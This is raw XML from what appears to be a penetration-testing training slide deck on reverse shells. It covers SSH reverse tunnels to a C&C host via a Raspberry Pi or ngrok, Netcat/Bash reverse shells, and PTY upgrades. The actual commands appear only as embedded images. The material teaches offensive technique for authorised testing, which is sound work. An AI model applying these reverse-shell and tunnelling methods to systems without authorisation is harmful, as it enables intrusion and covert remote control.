              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect b="50000"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="3841712"/>
            <a:ext cx="7820025" cy="190500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2DC6BB7-D872-41F5-96A2-3D4D8888E82B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="4259565"/>
            <a:ext cx="4972050" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4" name="Straight Arrow Connector 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFADEF6B-01B4-4F12-A50F-3DCADF50FB01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="5" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4449234" y="1555828"/>
            <a:ext cx="16467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6F7E9AB-760F-40E9-B9D0-B713DDDD0338}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5629882" y="1400127"/>
            <a:ext cx="3327687" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>/bin/false account on attacker SSHD</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Arrow Connector 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9ACC2A4C-0354-48F3-988F-83A77FA99A71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5973234" y="2269660"/>
            <a:ext cx="1475131" cy="3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96B88D-74D8-4CF8-BD8E-E322AE022A8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7288895" y="2084994"/>
            <a:ext cx="2831649" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Make the throwaway keys.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="Straight Arrow Connector 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{805F3D04-02E0-4E49-A207-AC1420B1865C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6278880" y="3322320"/>
            <a:ext cx="0" cy="519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5B352F2-94E8-4B3F-B6B7-CE194F798CFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5873070" y="2905036"/>
            <a:ext cx="2831649" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Establish the reverse tunnel</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Straight Arrow Connector 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C94322C-0C3C-4CD8-8B6D-B1F5D83E57FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5649384" y="4716765"/>
            <a:ext cx="969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958165D-BFEE-4ADD-A5CF-DB1121251CC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6278880" y="4532099"/>
            <a:ext cx="2831649" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Login from the C&amp;C</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="398370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6"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82BAD75-F8AC-4936-9D2E-A02E4938238B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="609600"/>
            <a:ext cx="8690504" cy="1320800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SSH Reverse Shells for WAN (Wide Area Networks)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78AD61B7-8744-4399-ADD8-69B1C77BED44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="2160589"/>
            <a:ext cx="8596668" cy="3880773"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Expanding upon the previous slide, it is possible to establish such reverse SSH tunnels to internet facing hosts such as AWS. Using device such as Raspberry Pi’s which are connected to the internal network (More of a Phys Pen technique).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If internet available services (AWS) are off-scope: It is possible to make use of a TCP tunnelling tool named </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ngrok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. Which allows TCP port forwarding for tunnels (SSH) to become available over WAN (Internet).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Allowing for reverse shells to be used without any internet services or even a Pi if a physical penetration test is not in scope.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="281987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14D16F1A-5D78-4402-81FF-31A98AFD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4B6B8-B5E7-4608-904D-861CD282EC7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1286933" y="609600"/>
            <a:ext cx="10197494" cy="1099457"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Agenda</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Isosceles Triangle 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B2FB7F0-6A45-43E8-88A7-48E46E6D4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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BA9C607-662B-4FBB-A3F3-CF593AD73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9A29C11D-4CF1-4D7B-87EF-3A4C2E4CAA5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2294495676"/>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754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88947BE-0DC3-40F1-83CA-99254DA31679}"/>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Other methods of Reverse Shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26BA4717-61B2-44BD-92AB-40BB347C0E00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="2160589"/>
            <a:ext cx="8596668" cy="3880773"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Any programming language capable of giving us a reverse shell can be used such as Python, Bash, Perl and even AWK!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>These solutions however are not encrypted which means any communications which are made between attacker/target are completely plain-text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Any monitoring third parties can then intercept these communications via network sniffing leading to a potential disclosure of sensitive information within the file system and risk of detection.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2497445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00516-D241-48C5-96E0-005E756BCA45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Netcat/Bash reverse shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E75A8E91-4003-4A71-820B-3B483DF24806}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="770110" y="1606550"/>
            <a:ext cx="4295775" cy="647700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4E89FCA-4D15-46E3-9531-A8748473365C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="770110" y="2387022"/>
            <a:ext cx="5476875" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7B6C8FA-8975-4DFE-9293-75B667ED5465}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect b="42698"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="770110" y="2824595"/>
            <a:ext cx="6372225" cy="2166856"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Straight Arrow Connector 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BD81DD1-B1B1-44D0-A532-C1F541D819EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5065885" y="1782618"/>
            <a:ext cx="2203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155A583-BAC3-4C83-A8D8-45F850CEA387}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7323588" y="1606550"/>
            <a:ext cx="3219171" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Port number listening on the machine to catch shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Straight Arrow Connector 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{331DD7EC-14D1-429B-A28D-2030AC7525ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="7" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6246985" y="2539422"/>
            <a:ext cx="17393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EC70B69-5478-4A41-BA60-9081956FF594}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7852095" y="2285945"/>
            <a:ext cx="1739334" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Explained in next slide</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C92F7EE-EFAB-477B-AE97-59EC0933BDB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1707118" y="5008230"/>
            <a:ext cx="4634959" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Get a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>pty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> using Python, background this process; translate characters to pass into remote connection preventing SIGINT from ending connection. Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>fg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> after </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>stty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> raw –echo (Not seen in image)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1805690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1" name="Straight Connector 40">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43"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49">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6" name="Picture 35" descr="Aerial view of container ship">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC9CB1FA-4841-4C94-B030-776D8DF7B345}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="833" r="34188"/>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51B49499-1DD6-46F5-9759-5DA961461E06}"/>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Bash payload explanation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="52" name="Straight Connector 5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sp>
        <p:nvSpPr>
          <p:cNvPr id="5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7917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5F054EF5-EFE6-45A2-834C-0F0931F39F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0" name="Straight Connector 69">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFE3C88A-FEDB-4B9C-94EE-5026B326B3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B5D51D9B-0E7C-44D3-9215-81F9915232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72" name="Rectangle 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16EFB339-1D4E-4824-A20B-AF30D07CF7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5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00030831-8136-4C61-8F00-6F190C5AE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4" name="Isosceles Triangle 73">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B14B360-4798-467E-ADE9-756959EC5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7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9433F2F7-DA21-430A-A31C-D529D9C6A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8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B24FFF9-F75D-4A88-90F8-D2D7BBB8E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9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0A2A2C4-404D-431C-8F9A-227932A42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Isosceles Triangle 77">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4661DBE2-1BC5-463F-BBB8-199B890D1C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Isosceles Triangle 78">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{710A6E70-F0B9-4E3D-9A78-2D2FEE5DF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81" name="Rectangle 80">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39178BE9-53D8-441A-8691-0ED3B464B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17B3608A-9DD9-46B9-ACC5-82F11B3F50F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="9775" r="1" b="11301"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="707675" y="643466"/>
            <a:ext cx="10776649" cy="5571067"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="539870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3578-93A2-488D-B38B-36E0196DB67E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The result of all this…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C030AEC7-6C2D-4FCD-A641-BB588A13A862}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
